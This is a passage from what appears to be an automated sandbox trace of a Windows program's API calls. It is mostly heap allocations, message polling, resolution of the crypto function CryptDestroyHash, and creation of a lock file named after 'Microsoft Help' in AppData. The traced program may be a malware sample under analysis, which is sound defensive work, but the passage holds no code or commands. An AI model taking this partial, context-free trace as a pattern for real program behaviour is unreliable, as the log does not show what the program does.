hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0248.098] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2b0 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0248.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0248.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0248.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0248.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0248.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0248.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0248.100] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0248.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0248.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0248.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0248.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.100] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0248.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0060 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0248.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0248.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8c8 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0248.102] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0248.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0248.104] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0248.104] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0248.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0248.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0248.104] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0248.105] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab50 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0248.105] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9e8 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0248.106] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa90 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0248.107] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bf8 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0248.108] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0248.108] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.108] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.108] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.108] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0248.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0248.108] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0248.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Microsoft Help" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0248.109] GetLastError () returned 0x5 [0248.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0248.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.109] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0248.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0248.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0248.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0248.109] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0248.109] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Local/Lock.Microsoft Help" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\lock.microsoft help"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0248.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0248.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.110] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.110] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0248.111] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa490 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0248.111] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0248.111] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bf8 [0248.111] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 